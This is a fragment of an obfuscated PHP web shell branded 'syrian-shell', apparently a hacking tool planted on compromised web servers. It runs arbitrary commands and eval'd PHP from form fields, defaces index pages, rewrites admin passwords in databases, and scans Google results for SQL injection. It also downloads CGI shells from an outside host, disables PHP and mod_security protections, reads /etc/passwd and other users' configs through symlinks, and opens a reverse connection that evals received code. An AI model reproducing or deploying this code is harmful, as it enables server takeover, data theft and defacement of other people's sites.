if(empty($_POST['cmd'])){iiIolll1o11oIOll($os);} else if (strtolower(substr($_POST['cmd'],0,2)) == 'cd') {chdir(strtolower(substr($_POST['cmd'],3)));iiIolll1o11oIOll($os); } else { $exec = Exe($_POST['cmd']); if($exec){echo $exec;} else{iiIolll1o11oIOll($os);} } } else if($_POST['UpdateIndex']) { $hackingType = $_POST['hackingType']; $ScriptType = $_POST['ScriptType']; if($hackingType == 'indexChanger') { iIO0io1IO0OI1lii($_POST['HOST'],$_POST['USER'],$_POST['PASS'],$_POST['DB']); $index = stripslashes($_POST['INDEX']); $prefix = $_POST['PREFIX']; if($_POST['injectShell'] == 'yes') { $injectShellType = $_POST['InjectShellTypeSpan']; } ii10i1O10IIIOi11($ScriptType,$index,$prefix,$injectShellType); } else if($hackingType == 'changeInfo') { iIO0io1IO0OI1lii($_POST['HOST'],$_POST['USER'],$_POST['PASS'],$_POST['DB']); changeInfo($ScriptType,$_POST['adminID'],$_POST['userName'],$_POST['password']); } else if($hackingType == 'decrypt') {iioO1iiiOOoIi1l0($ScriptType);} } else if($_POST['submitEval'] && ($_POST['evalOrEnc'] == 'analyze')) { $hash = $_POST['php_eval']; $i1llioo0OO0llIo1 = substr($hash,0,3); if($i1llioo0OO0llIo1 =='$ap' && strlen($hash) == 37){echo "T\150e \110\141\x73\x68 : ".$hash." \151\x73 : MD5(A\120\122) \110\x61\x73\150";} else if($i1llioo0OO0llIo1 =='$1$' && strlen($hash) == 34){echo "\124h\x65 \110\x61\x73h : ".$hash." \x69\163 : M\x44\x35(U\116\111\130) \110\x61\x73\150";} else if($i1llioo0OO0llIo1 =='$H$' && strlen($hash) == 35){echo "\x54\x68\x65 \110ash : ".$hash." is : M\1045(\160\150\160\102\x42\063) \110a\163\150";} else if(strlen($hash) == 29){echo "\124\x68\x65 H\x61s\x68 : ".$hash." \151\163 : \115\x44\x35(W\157\x72dpr\x65s\x73) \x48a\163h";} else if($i1llioo0OO0llIo1 =='$5$' && strlen($hash) == 64){echo "\x54\x68\145 \110\x61sh : ".$hash." i\163 : \x53\x48\10125\066(\125\x4eIX) Ha\163h";} else if($i1llioo0OO0llIo1 =='$6$' && strlen($hash) == 128){echo "Th\x65 Has\x68 : ".$hash." \x69\163 : \123H\x41\x351\062(\x55\116\111\x58) \110as\150";} else if(strlen($hash) == 56){echo "T\x68\145 \x48\x61\x73\150 : ".$hash." is : \123HA2\062\x34 \x48\141\x73h";} else if(strlen($hash) == 64){echo "\124he \x48\141\163h : ".$hash." \151\163 : S\110\x41\x325\066 \x48\x61s\x68";} else if(strlen($hash) == 96){echo "\x54\x68\145 \110\141sh : ".$hash." \151s : S\x48A3\x38\x34 H\x61\x73h";} else if(strlen($hash) == 128){echo "\124\x68\145 Has\150 : ".$hash." i\x73 : S\110A5\061\062 \110\x61\163\x68";} else if(strlen($hash) == 40){echo "T\150\145 H\x61\x73\150 : ".$hash." \151s : \115\171\123\x51\x4c V\x35.3.\x78 \x48\141\x73\150";} else if(strlen($hash) == 16){echo "\124he \110\141\163\150 : ".$hash." \x69\x73 : \115y\x53Q\114 \110\141\x73\x68";} else if(strlen($hash) == 13){echo "\124\x68e Ha\163h : ".$hash." \x69\x73 : D\105S(\x55\x6ei\170) \110ash";} else if(strlen($hash) == 32){echo "\124\x68e \x48\141\163h : ".$hash." \x69\x73 : \x4d\x44\x35 Ha\163\150";} else if(strlen($hash) == 4){echo "T\150e \110\x61\x73\x68 : ".$hash." \x69s : [C\x52\103-16]-[\x43RC-16-\x43\103\x49T\x54]-[\x46\103\x53-16]";} else {echo "\105\x72\162\157r : \103\141\156'\x74 \x44\x65\164e\x63\x74 \110a\163\150 T\x79\x70\145";} } else if($_POST['submitEval'] && ($_POST['evalOrEnc'] == 'eval')) { $eval = str_replace("","",$eval); $eval = str_replace("\\","",$eval); eval($eval); } else if($_POST['submitEval'] && ($_POST['evalOrEnc'] == 'enc')) { if(!empty($_POST['php_eval'])) { $i0oll011iiiI0oi1 = $_POST['php_eval']; for ($i=0;$i/", i1iOiooI011Ioo0o(str_replace(array("R\105\x50\x4c\x41CE_\104O\122\113", "R\x45P\114\101C\x45_ST\101RT"), array("".$_POST['dork']."", "$b"), $google)), $sites); echo "R\145s\x75\x6c\x74 of \x69\156\152\x65\x63ti\157\x6e...\n"; ob_flush();flush();sleep(1); while(1) { ob_flush();flush();sleep(1); if(preg_match("/\x59o\165 h\x61\x76\x65 an e\x72ror \x69\156 \171\x6f\x75\x72 \123Q\x4c|Div\x69\x73\x69o\x6e b\171 \172\145r\157 \x69\x6e|s\x75\160\x70\x6c\151\x65\x64 \x61\162g\165\155ent i\x73 \156\157\164 a v\x61li\x64 M\171SQL result \x72\x65\163o\x75\162\x63e \x69\x6e|C\x61l\154 to a \155\x65\x6dbe\162 \146\165n\x63\x74\x69o\156|\x4di\x63r\157\163\x6f\x66t J\x45\x54 Dat\141\142\x61se|O\x44\102\x43 \x4d\151\x63r\157\x73\x6f\146\164 \101\143\143\145\x73\163 \x44r\151v\145r|\115icr\157s\x6f\x66t OLE \104B \120r\x6fvi\x64er \146o\x72 S\121\114 S\145\x72\166\x65r|\125\156cl\x6fse\144 \161\165\x6f\164\x61\164io\x6e \x6d\x61\x72\x6b|M\x69\x63\x72\157\163\157\146\164 O\114\x45 D\x42 \120\162o\x76i\144\145\162 f\x6fr Oracle|\111\x6e\143\x6frrec\164 \x73\171\x6e\x74a\170 n\x65\141\x72|SQL query \x66\141\x69l\145d/", i1iOiooI011Ioo0o(str_replace("=", "='", $sites[2][$a])))) { echo str_replace("=", "='", $sites[2][$a])." <== \131e\x61\x68..\126\x75ln\145\x72\141\x62le ! \n"; } else { echo str_replace("=", "='", $sites[2][$a])." <== \116\157\164 \126ul\x6e\145r\141\142le..\x73\x6fr\x72y! \n"; ob_flush();flush();sleep(1); } if($a > count($sites[2])-2){echo "\x4cet\163..s\143\141\156 o\164\x68\x65\162 p\141\147\145.. \n";break;} $a = $a+1; } $b = $b+100; } } else if($_POST['doAction'] && ($_POST['someAction'] == 'showUsers')) {showUsers();} else if ($_POST['helpCommands']) { echo " |--------------------------------------------|----------------------------------------------------|---------------------------------------------| | C\x6f\155ma\156\x64 | Ex\141\155\x70l\145 | \x43\x6f\155\x6d\145\156t | |--------------------------------------------|----------------------------------------------------|---------------------------------------------| | zip | zip F\x69\154\x65N\141m\x65 | C\157\x6dpre\x73\x73 t\150\145 \106i\x6ce\163 \x49n\164\x6f a ZI\120 A\x72c\x68\151\166\x65 | | u\x6e\x7a\x69\x70 | u\x6e\x7a\x69\160 \x46i\154\145\116\x61\x6d\x65 | \x45\x78\164ra\143\164 \x74\150\145 Z\x49P \101r\x63\150\x69v\145s | | \164\x61\162 -z\x63\x66 | t\141\162 -z\x63\146 zz.\164a\162 d\141\151\154\x79 | \x43\157\x6dpr\x65s\x73 \164h\x65 F\x69\154\145\163 In\164o a \x54\101R \101\x72c\150\x69\x76e | | t\141r -z\x78\146 | \x74\x61\x72 -\x7a\170f z\x7a.\x74\x61r | Ex\x74\x72ac\164 \x74\x68\x65 \x54A\122 \101rc\150iv\145s | | \x74\141\162 -\143\172v\x66 | \164\x61r -\143\172\x76\146 F\x69leN\141me.\x74\141\x72.g\172 F\x69le\x4e\x61\155\x65 | \103\157mp\162es\x73 \164h\145 \106il\x65s \x49n\x74\x6f a \x47\x5a A\162\143\150\x69v\x65 | | gzip -d | gzip -d Fi\x6c\x65\116am\145.g\x7a | \105\170\164r\x61\143t \x74\x68\x65 \107\132 Ar\x63\150\151\166e\x73 | | \x74\141\x72 -\x63\172\166\x66 | \164\141\x72 -c\172\166\146 \106i\154\145\x4e\141m\x65.\x74a\162.\x67\x7a \x64ata\142\x61\x73\145.sql | C\x6fmp\162e\163\163 \x74\150\x65 File\x73 \111n\x74\x6f \123\121L A\162\x63\150i\x76\x65 | | \164a\x72 -zxv\146 | \x74\x61\x72 -\172\x78\x76\x66 F\x69\x6c\x65Na\155\x65.\164\141r.\x67\172 | E\x78\x74r\x61\143t \x74h\145 \x44\x61\x74\141ba\163\145 \x46\x69\x6c\x65\163 S\x51\114 | | t\x61\x72 -\x63\172\x76\x66 | tar -c\x7av\x66 \x46il\145\x4e\x61\155\145.\x74ar.g\x7a Ne\167\x46i\x6ce\116a\155\145 | \103\157\x6d\160\162\145\x73\x73 t\150\145 F\157\x6c\x64er\163 \111\x6et\157 a t\141\162.\147\172 \101\162ch\151\x76e | | \x6c\163 | ls /h\157m\x65 | Vi\145\167 \164\150e \146\151les name in \x74\x68\145 directory | | \154\163 -\x6c\x61 | ls -\x6c\x61 /\x68\x6f\155\145 | \126i\145\x77 \x46\x69\154\x65\x73 \101\156\144 Fold\145\x72s \x69\156 h\x69d\x64en \146\x69\x6c\145s | | \160wd | p\167d | \123\x68ow \164\x68e \103\165r\162e\x6et \x50a\164\150 | | ; | \x6c\x73;\160\x77\x64 | \103\157m\x62i\x6e\145 th\145 \x43o\155ma\x6e\x64s | | \167get | \x77get \x68\x74\x74\x70://site.\x63\157\155/\x66i\x6c\145.zip | Get \x66i\154\x65 \146\162om U\x52L \x55\x73\x69\156\x67 \127\147e\164 C\x6fmm\x61\156\144 | | curl -o | curl -\157 h\164\x74\160://site.\143\157\155/f\151\154e.zip | \x47e\164 \x66\151\x6c\145 \x66\162\157\155 \x55\x52L U\163\151n\x67 curl -\x6f \103o\155\155\141\x6e\x64 | | \x6c\171\156x -\163\x6f\x75rce | lynx -s\157u\162c\145 \150\164tp://site.com/\x66i\x6ce.zip | \107et f\151\154\x65 \146\162\x6f\x6d URL U\x73ing l\171\156\170 -so\x75\x72\x63e \103\157\155\155\141\x6e\x64| | \x67e\x74 | \147\x65\x74 \150\164t\x70://site.\x63\157m/f\x69\154\x65.zip | \x47\x65t \146\x69\154\x65 \146\162o\x6d U\122\x4c \125\x73\151\156\147 \x67\x65t \x43\157\155\155\141n\x64 | | \x68i\163\x74\x6f\162\171 | \150isto\x72y | S\150\157\167 A\154\154 Pre\166\x69\x6fu\163 \103\x6fm\x6da\x6e\144\x73 \x74\x68\141\164 y\157\x75 \x45\170e\143\165t\x65d| | \x6d\153d\151r | \155\x6bdi\162 /m\x79\x4ee\x77D\151\162 | \155\x61k\145 a \x6ee\167 D\151\x72\145c\164\x6f\162\171 \x69\156 t\x68e server | | \x72m | rm \146\x69l\x65 | \x44e\154e\164\151\156\x67 F\x69\x6c\x65\163 | | \x72m -\162 | \162m -r \155\171D\x69\x72e\x63\164o\162\x79 | \x44\x65\154\145t\x69\156g D\x69\162\x65\x63t\x6fr\171 \141\x6e\144 it's F\x69\x6c\x65s | | e\144\151\164 | \145\x64i\164 m\x79\106\x69\x6c\145 | E\x64\x69\164 a \x66\x69\154\x65 \165\x73\151\156\147 text \145di\x74\145r | | \x77\x68\157 | w\150\157 | \x77\150\x6f's \x43\x6f\156\156\145c\164\x65\x64 to t\x68\145 server | | \x63\144 | \x63\144 /\x68\157\155\145/user | \x45\156\164e\162 \164he \123\145\x6c\x65\143\164\x65\144 P\141th | | \x63\x64 ../ | \143\144 ../ | \x47\x6f \124\x6f U\160\x70\145\x72 \x44\x69\162\x65\143to\x72\x79 | | \x6dv | \155\166 \155\x79\106\151\x6ce1 /\x68\157\155\x65/\155\171\106\x69l\145\062 | M\157ve \x41nd Re\156\141\155e Th\145 F\x69\154\x65 | | f\x69\x6e\x64 | f\x69\x6e\x64 \155\171\106\x69l\x65 | \x4co\x6f\x6b\151\x6eg f\157\x72 a f\151\x6ce \x6f\x72 \146o\x6cde\162 | | ./ | ./l\x6f\x63\141l\x72\x6fot | \x45x\x65\143\x75t\x65 the \105\170\145\x63\165t\x61\x62\154\x65 \146\x69\154e | | \x73\x68 | \x73h loc\x61\x6cro\x6ft | E\170\145\x63u\164\x65 \x74he shell \120\162\157\x67\162a\x6d\155\x69\156\x67 C\x6fd\x65 | | uname -a | uname -a | \126i\145\167 T\150e S\145\162ve\162 \x4b\145r\x6ee\x6c In\146o\162\x6d\x61\164\151o\x6e | | * | rm * | \105x\x65cute \x74he C\157m\155\141\156d \x66o\x72 al\154 | | \155\141n | \155\141\156 \x6c\x73 | H\145\154\160 About \x6cs \103\x6f\x6d\x6da\156\144 | | \164ou\x63\150 | \x74o\165\x63\150 \x6dyFi\154\145 | \x43\x72\145\141t\x65 \101 \156e\167 F\151\154\145 | | \x67\x63c | \147\x63c \x6d\171\x46\151\154\x651 -\x6f my\106\151\x6ce2 | \x43\157n\x76\x65\x72\164 to \102i\156\x61ry E\170\x65\143ut\x61\142le \106\151\x6ce | | \x63at | \143\x61\164 \x6dy\x46\x69\x6c\145 | \x52\145\141\144 th\145 F\x69\x6c\145 c\157\x6et\145\x6e\164s | | \155\x6f\162e | m\157\162\145 \155\x79\106\151le | \x52\145\x61\144 \x74\x68e File \145\141si\x6cy \x69\146 \x69\x74's \x6c\141r\147 | | \160i\143o | \x70\x69\x63\x6f \x6d\171F\151\x6ce | \x45\x64\151\x74 \106\x69\154\x65 U\163\151\156g \120\151\143o \x54\145\x78t \105d\x69\164\x65r | | perl | P\145r\154 m\x79F\x69\154e.\x70\x6c | \x45x\x65\143\x75\x74e \x74\150e Pe\162\154 \x53c\162\x69\160t\x73 | | \154\156 | \154\156 -s /\x68o\155\145/my\106\x69l\x65 \155\x79\114i\x6e\x6b | M\x61k\x65 a lin\x6b to t\x68e \x66\151\x6ce | | g\162\x65\x70 | g\162\x65\160 \x6dy\106\x69\154e \x6dy\x54\x65\x78t | \x4coo\153 \x66\x6fr \164\x68\x65 Te\x78\x74 \151\x6e the \106i\154\x65 | | \x63\x68\155\x6f\x64 | c\x68m\x6f\144 755 my\x44\151\x72ec\164o\162\x79 | C\x68\x61\x6e\147\145 \x74\x68\x65 p\x65\162\155\x69\163s\151\157\156 to \x46\151l\x65s O\x72 \106o\x6cd\x65\162s | | \143\150o\167n | \143\150o\x77n r\x6f\157\164 m\x79F\x69\154\x65 | \x43\x68\x61\156\147e t\150e \x46\151\x6c\x65 O\167\x6ee\x72 | | \143\x68\147r\160 | \143\x68gr\x70 \162o\157\x74 \155\171\106i\154\x65 | C\150\x61\156g\x65 \x54\x68\145 \x46\x69\154\145 \x47\x72\x6fu\x70 | | \x63l\145a\162 | \x63\x6c\x65\x61\162 | C\154\x65\x61\x72 \x74\150\145 \x53\143\162\145\x65\x6e | | \143\x6d\160 | cm\160 \x6dy\106\x69\154\145\061 my\x46\x69\x6c\1452 | \103\x6f\x6dp\x61r\x65 \x74h\145 \124\157\x77 \106i\154\145\x73 | | \x63ry\x70\x74 | c\x72y\x70t \x6d\x79Fi\154e | \124o \105ncr\171\x70\164 \x6d\171F\x69\154\x65 | | \143\x73\x70l\151\164 | \x63s\160\154\151t \155\x79\x46\x69\154\x65 | \x53\x70\x72\x65\141\144 \164\x68\145 Fi\154\x65 \111nt\x6f \x70\151ec\x65\x73 | |--------------------------------------------|----------------------------------------------------|---------------------------------------------| "; } else if($_POST['generatePel']) { chdir($_POST['cgiperlPath']); mkdir('cgi', 0755); chdir('cgi'); iloOl1lloloI1loI('http://www.syrian-shell.com/cgi/compiler.zip'); UnZip('compiler.zip',getcwd()); DeleteFile('compiler.zip'); iI11i0Il0iO0iooi("compiler",0777); if($_POST['cgiType'] == "\143\147i\x50e\162\154") { iloOl1lloloI1loI('http://www.syrian-shell.com/cgi/cgiPerl.zip'); UnZip('cgiPerl.zip',getcwd()); DeleteFile('cgiPerl.zip'); iI11i0Il0iO0iooi("\143g\151\x50\145r\154.\x73y\063",0755); echo ' Go To Link : cgi/cgiPerl.sy3 Password Is : sy3' ; } else if($_POST['cgiType'] == "\143\x67\x69P\x61\x79\164ho\156") { iloOl1lloloI1loI('http://www.syrian-shell.com/cgi/cgiPaython.zip'); UnZip('cgiPaython.zip',getcwd()); DeleteFile('cgiPaython.zip'); iI11i0Il0iO0iooi("\x63\x67\151\120\141y\x74\x68\x6fn.s\171\x33",0755); echo ' Go To Link : cgi/cgiPaython.sy3 '; } else if ($_POST['cgiType'] == "c\x67i\125s\x65r\163") { iloOl1lloloI1loI('http://www.syrian-shell.com/cgi/users.zip'); UnZip('users.zip',getcwd()); DeleteFile('users.zip'); iI11i0Il0iO0iooi("u\163er\x73.sy\x33",0755); echo ' Go To Link : cgi/users.sy3 '; } iii0li0iIOii1III('.htaccess','AddHandler cgi-script .sy3'); } else if($_POST['changePermission']) { if($os == 'Windows'){echo "[-] \x4eo \120er\155\x69\x73\x73i\x6f\x6es \x69\156 Windows \117\123.";} else { $ilII1o111lIlIlIo = iI11i0Il0iO0iooi($_POST['fileName'],$_POST['per']); if($ilII1o111lIlIlIo){echo "[+] \x50\145\x72\x6d\x69\x73\163\x69o\x6e \x43\150\141ng\145d S\x75c\143\145\163\163f\x75l\154\171 ! " ;} else{ echo "[-] C\x68a\156gi\x6e\147 \x49\x73 No\x74 \x41\154\154o\x77\x65\x64 \117r \x54he Fi\154\145 \151\163 \x6e\x6f\x74 \x45x\151\163\164 !";} } } else if($_POST['generateForbidden']) { chdir($_POST['forbiddenPath']); mkdir('forbidden'); chdir('forbidden'); $htaccess = fopen('.htaccess','w+'); if($_POST['403'] == 'DirectoryIndex'){fwrite($htaccess,"\104\x69r\x65c\164\x6f\x72\171\x49\x6e\x64ex \151n.\164x\164");} elseif($_POST['403'] == 'HeaderName'){fwrite($htaccess,"\110\x65\x61\x64\x65rN\141\155e \151\156.\164\x78t");} elseif($_POST['403'] == 'TXT') { fwrite($htaccess," O\160t\151\157\156s \111n\x64\145\x78\145s F\157ll\157w\x53\171\155\x4c\x69\x6e\x6b\163 a\144d\124y\x70e t\170t .\160hp \x41d\144\110\x61\x6e\144le\162 tx\x74 .\160h\x70"); } elseif($_POST['403'] == '404') { fwrite($htaccess," \x45\162\x72\157\x72\104oc\165m\x65\156\x74 404 /404.ht\x6dl 404.\x68t\155l = \x53\171\155\x6cin\x6bed i\x6e.\164\x78\x74 "); } elseif($_POST['403'] == 'ReadmeName'){fwrite($htaccess,"Re\x61\144m\x65\116a\155\x65 \x69n.t\x78\164");} elseif($_POST['403'] == 'footerName'){fwrite($htaccess,"\146o\157t\x65r\116\141\155\145 \151\x6e.t\170t");} echo " \116\x6f\167 G\x6f To [ \x66\157\162\142i\x64\x64\x65\156 ] D\151\x72 \101n\x64 T\x68e\x6e m\x61k\x65 \124he \123\x68\157rt\x63\x75t [ in.txt ] E\x58 : \154\156 -s /h\157me/user/\160\x75\142li\x63_h\x74\155l/config.\160h\160 \x69\x6e.\x74xt"; } else if($_POST['UploadNow']) { $uploadingDir = $_POST['uploadingDir']; $uploadingDir = str_replace("\\\\","\\",$uploadingDir); $uploadingDir = str_replace("//","/",$uploadingDir); chdir($uploadingDir); $iOOIiiO0lOooIoOi =0; $iIliilO1l0lIio0I = array(); $path= ''; $i1o1iOooOlooOIi1= $path . basename($_FILES['uploadfile']['name'][$i]); for ($i = 0; $i < count($_FILES['uploadfile']['name']); $i++) { if($_FILES['uploadfile']['name'][$i] != '') { move_uploaded_file($_FILES['uploadfile']['tmp_name'][$i], $i1o1iOooOlooOIi1 . $_FILES['uploadfile']['name'][$i]); $iIliilO1l0lIio0I[] = $_FILES['uploadfile']['name'][$i]; $iOOIiiO0lOooIoOi++; echo "\124\x68\x65 \x46\151\x6ce ".basename($_FILES['uploadfile']['name'][$i])." U\160\154oa\x64\145d S\165\143\143\x65\x73sf\x75\154ly ! "; } else "T\150e \106\151\x6ce ".basename($_FILES['uploadfile']['name'][$i])." C\141\x6e'\164 \102e \x55p\x6c\x6f\141d :( !"; } } else if($_POST['doAction'] && ($_POST['someAction'] == 'genPhp')) { $iOIOi1l01liIIol1 = iii0li0iIOii1III("p\150p.\x69n\x69"," safe_mode = \117f\x66 \144\151\163\141\142\154\x65_\x66\x75\x6e\143t\151\x6f\156s = \x4e\117\116\x45 s\x61\146\145_\x6do\x64\145_g\151\144 = \117\x46\106 \157\x70e\x6e_\x62\x61s\145\x64i\x72 = \x4f\x46F"); echo "\160\150\160.ini H\x61\x73 \x42\145\x65\x6e G\145\x6e\145\x72\x61\164\145d \x53u\x63c\x65\x73\x73\146\x75\x6c\x6cy"; if($iOIOi1l01liIIol1){echo "[+] \160\x68\160.\151\156\x69 Has Bee\156 G\145\x6e\145ra\x74ed \x53u\143\143\145\163sf\x75\x6cly ";} else {echo "[-] \x46\x61\151\154\145d to \x67e\x6e\x65\x72\141t\x65 \160h\x70.i\x6ei fi\x6c\x65 !! ";} } else if($_POST['doAction'] && ($_POST['someAction'] == 'genHtaccess')) { $iOIOi1l01liIIol1 = iii0li0iIOii1III(".htaccess"," \x53e\143\x46\151l\x74e\x72E\x6e\x67\151n\x65 \x4ff\x66 \x53e\x63Fi\154te\162S\x63\x61nPO\x53\124 \117ff \123ecF\x69\154\164\x65rCh\x65\x63kU\x52\114\105\156c\157\x64\151\x6eg \117\146\x66 S\x65\x63\x46\x69l\164\145r\103\x68ec\153\x43\x6fo\153\x69\x65\x46\157\162ma\x74 \117\146f SecFi\154\164e\162\x43hec\153\x55\x6e\x69c\157d\x65E\156co\144\x69\156g \x4f\146f S\145\143\106\151l\164\x65\162\116\157\x72\155\x61\154i\172\145C\157o\x6b\151e\x73 \x4f\x66\x66 \x53\145tEn\166 \x50H\x50\122\103 ".getcwd()."/\x70\150\160.\151\x6ei s\x75PH\x50_C\157nf\151\147\x50\x61th ".getcwd()."/\160\150p.\151\156i "); if($iOIOi1l01liIIol1){echo "[+] .htaccess \110\141\x73 \102\x65\x65\x6e G\145\x6ee\x72ated S\x75\143\143e\163\x73\x66\x75\154\154\x79 ";} else {echo "[-] \106\141\x69\154\x65\x64 to \x67\145\156\x65r\141\x74\145 .htaccess fi\154\x65 !! ";} } else if($_POST['doAction'] && ($_POST['someAction'] == 'genINI')) { $iOIOi1l01liIIol1 = iii0li0iIOii1III("\151\x6e\151.\160\x68p",' ini_restore("safe_mode"); ini_restore("open_basedir"); '); if($iOIOi1l01liIIol1){echo "[+] \151\x6e\151.\x70\x68p \x48a\163 \102\x65\x65\x6e \x47\x65\x6e\145\162a\164e\144 S\165\x63ces\x73fully";} else {echo "[-] \106\x61\151l\145\x64 to \x67\145n\x65\x72\x61t\145 \151\156\151.\160h\x70 fi\154\x65 !! ";} } else if($_POST['read'] || $_POST['show']) { $file = $_POST['file']; $file = str_replace('\\\\','\\',$file); $file = str_replace('//','/',$file); if($_POST['read']){iioiio0iiI0loioo($file);} elseif($_POST['show']){iOiIliO1iIoii1il($file);} } else if($_POST['metaConnect']) { $ip = $_POST['ip']; $port = $_POST['port']; if ($ip == "" && $port == ""){echo "P\154\x65\x61se \146\151\x6cl IP \x41\144\162es\163 & \124h\145 \x6c\151s\164\145\156 Po\162t";} else { $i0li1oio1lO0I0oO = $ip; $port = $port; if (FALSE !== strpos($i0li1oio1lO0I0oO, ":")) {$i0li1oio1lO0I0oO = "[". $i0li1oio1lO0I0oO ."]";} if (is_callable('stream_socket_client')) { $iliillOo0001IIii = stream_socket_client("\164\x63\x70://{$i0li1oio1lO0I0oO}:{$port}"); if (!$iliillOo0001IIii){die();} $iil01ioO0OlOIIOO = 'stream'; } elseif (is_callable('fsockopen')) { $iliillOo0001IIii = fsockopen($i0li1oio1lO0I0oO,$port); if (!$iliillOo0001IIii) {die(); } $iil01ioO0OlOIIOO = 'stream'; } elseif (is_callable('socket_create')) { $iliillOo0001IIii = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); $i0IoililO0ooIl01 = socket_connect($iliillOo0001IIii, $i0li1oio1lO0I0oO, $port); if (!$i0IoililO0ooIl01) {die(); } $iil01ioO0OlOIIOO = 'socket'; } else {die();} switch ($iil01ioO0OlOIIOO) { case 'stream': $len = fread($iliillOo0001IIii, 4); break; case 'socket': $len = socket_read($iliillOo0001IIii, 4); break; } if (!$len) {die();} $a = unpack("\116\154\145\156", $len); $len = $a['len']; $iI1Iio1l0OIIOI0l = ''; while (strlen($iI1Iio1l0OIIOI0l) < $len) { switch ($iil01ioO0OlOIIOO) { case 'stream': $iI1Iio1l0OIIOI0l .= fread($iliillOo0001IIii, $len-strlen($iI1Iio1l0OIIOI0l)); break; case 'socket': $iI1Iio1l0OIIOI0l .= socket_read($iliillOo0001IIii, $len-strlen($iI1Iio1l0OIIOI0l)); break; } } eval($iI1Iio1l0OIIOI0l); echo "[*] Co\x6e\x6e\x65cti\157n T\145r\x6d\151\x6e\x61t\145\x64"; die(); } } if (isset($_POST["\x73\165bm\151\x74_\154\x6fl"])) { set_time_limit(0); $url = $_POST['hash_lol']; echo "\x54\145s\x74\x69\156\147 ".$url."\n"; $extention = $_POST['extention']; $iol0l0o0olIiO101 = array( "admin/", "\x77\160-admin/", "\141d\x6d\151n\x69s\x74r\141\164\151\x6fn/", "adm\151n\x69st\x72\x61\164\157r/", "mo\144\145\162a\x74or/", "w\145\142\141dmi\x6e/", "\141dmi\156a\162\x65\x61/", "\x62\x62-admin/", "\x61d\x6d\x69n\114o\x67\151n/", "a\144\155in_a\x72\145\141/", "\x70\141\156el-\141dm\151\156ist\x72\x61\x63io\156/", "ins\x74\x61\144min/", "\x6d\x65\x6dber\x61\144\155i\x6e/", "ad\155\151\156\151\x73\x74r\x61t\157\162l\x6fgi\x6e/", "ad\155/", "\x73\151\164e\x61\144\x6d\x69\156/login".$extention."", "admin/account".$extention."", "admin/index".$extention."", "admin/login".$extention."", "admin/admin".$extention."", "\x61\144\x6d\x69\x6e_\x61re\141/login".$extention."", "\141\x64mi\156_a\162\x65\141/index".$extention."", "admincp/index".$extention."", "\141\144\x6di\x6e\x70\x61\x6eel".$extention."", "\167\145ba\144mi\x6e".$extention."", "w\145\x62\x61dm\151\x6e/index".$extention."", "\x77\x65\x62\141\144min/login".$extention."", "admin/admin_\x6c\157g\x69\156".$extention."", "\x61\x64m\x69\156_\154\x6f\147i\x6e".$extention."", "\160\x61\x6e\145\154-a\144m\151n\x69\163\x74\x72a\x63ion/login".$extention."", "\141d\155\x69\156_\x61\162\145\x61/admin".$extention."", "bb-admin/index".$extention."", "b\142-admin/login".$extention."", "\142\x62-admin/admin".$extention."", "admin/\150\157\x6d\x65".$extention."", "\160\141g\145s/admin/admin-login".$extention."", "admin/admin-login".$extention."", "admin-login".$extention."", "admin/\x61\144\x6din\x4co\x67\x69n".$extention."", "\x68o\x6d\x65".$extention."", "\141\x64\x6d\151\156\141re\141/index".$extention."", "admin/\143\x6f\156t\162\x6f\154p\x61\x6e\145\154".$extention."", "admin".$extention."", "admin/c\160".$extention."", "cp".$extention."", "a\x64m\x69\156p\141\156\x65\154.p\150\x70", "\x6do\x64\x65\x72\x61\164\157\162".$extention."", "\141\x64m\151\x6e\151s\x74\x72\x61\164o\x72/index".$extention."", "\141\144m\151ni\x73t\x72\141\x74\x6f\x72/login".$extention."", "user".$extention."", "\x61\144\x6d\151\156i\x73\x74\x72\x61\164o\x72/account".$extention."", "a\144\155\151\x6e\x69\163\164\162\141\x74\x6f\x72".$extention."", "login".$extention."", "mo\x64\145\x6cs\x65\x61rc\150/login".$extention."", "m\x6f\x64er\x61t\157r/login".$extention."", "p\x61nel-a\144m\x69\156\151s\164r\141\x63io\x6e/admin".$extention."", "a\144\155\x69n\x63on\x74\162\x6fl/login".$extention."", "a\x64\155/index".$extention."", "mo\x64e\x72\141\164\x6fr/admin".$extention."", "account".$extention."", "\x63o\x6e\x74\x72\x6fl\x70\141\x6e\145\154".$extention."", "\x61\x64m\151\x6ec\x6fn\x74\162\x6f\154".$extention."", "w\x65\142\141d\155\x69\156/admin".$extention."", "\141\x64\155\x69n\114o\x67\x69\156".$extention."", "\x70\x61\x6ee\x6c-a\x64\x6di\x6ei\x73\x74r\x61\143i\x6f\156/login".$extention."", "\167p-login".$extention."", "a\x64\155i\156\114o\147i\156".$extention."", "admin/a\x64minL\157\x67\x69\156".$extention."", "a\144m\151n\141re\141/index".$extention."", "\x61\144\x6d\x69\156are\x61/admin".$extention."", "ad\x6d\151n\141\162\145\x61/login".$extention."", "\160\x61n\x65l-\141\x64m\151n\151\163\x74\x72\141cion/index".$extention."", "\x6d\x6f\144\145\x6cse\x61\162\143h/index".$extention."", "\155ode\154s\x65\141\x72\143\150/admin".$extention."", "\x61\x64m/\141\144\155\154oginu\163\145r".$extention."", "\141d\155\154o\147i\156\x75\163\x65\x72".$extention."", "ad\155\x69\156\x32".$extention."", "\x61\x64\x6d\x69\x6e\x32/login".$extention."", "a\144\x6din2/index".$extention."", "ad\155/index".$extention."", "\141\x64m".$extention."", "a\146\146\x69l\x69a\164\145".$extention."", "\141\144\155_auth".$extention."", "\155e\155b\145\x72a\144m\x69n".$extention."", "\x61d\x6di\x6e\x69\163\164ra\x74\x6frl\x6f\147in".$extention.""); foreach ($iol0l0o0olIiO101 as $admin) { $iliIi000o0ioIIi0 = get_headers("$url$admin"); if (eregi('200', $iliIi000o0ioIIi0[0])) {echo "[+] $url$admin ~ Fou\156\x64!\n";} } } else if($_POST['doAction'] && ($_POST['someAction'] == 'findCon')) { set_time_limit(0); $passwd=fopen('/etc/passwd','r'); if (!$passwd) { echo "[-] E\162\x72\x6fr : c\x6f\165d\156'\164 read /\x65t\143/passwd"; exit; } $i1lo1iol011OI0O0=array(); $users=array(); $i0iOlloi011lIO1o=array(); $i=0; while(!feof($passwd)) { $i00O1OOOo000OIiI=fgets($passwd); if ($i>35) { $pos=strpos($i00O1OOOo000OIiI,":"); $username=substr($i00O1OOOo000OIiI,0,$pos); $i0111ol01loIl1Oi="/\x68\x6fme/$username/p\x75\x62li\x63_\x68tm\154/"; if (($username!="")) { if (is_readable($i0111ol01loIl1Oi)) { array_push($users,$username); array_push($i1lo1iol011OI0O0,$i0111ol01loIl1Oi); } } } $i++; } echo ""; echo "[+] 